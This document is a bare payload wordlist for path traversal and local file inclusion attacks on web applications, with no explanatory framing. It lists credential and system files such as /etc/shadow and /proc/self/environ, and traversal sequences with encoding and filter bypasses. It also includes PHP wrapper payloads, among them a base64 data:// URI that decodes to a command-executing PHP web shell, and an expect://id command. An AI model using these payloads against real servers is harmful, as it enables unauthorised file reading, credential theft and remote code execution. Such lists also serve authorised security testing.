/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/resolv.conf
/etc/network/interfaces
/proc/self/environ
/proc/self/cmdline
/proc/version
/proc/cpuinfo
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/auth.log
/var/log/syslog
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/etc/passwd
..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
....//....//etc/passwd
....\/....\/etc/passwd
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=index.php
php://input
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
expect://id
/windows/win.ini
/winnt/win.ini
C:\windows\win.ini
C:\boot.ini
C:\inetpub\wwwroot\index.asp
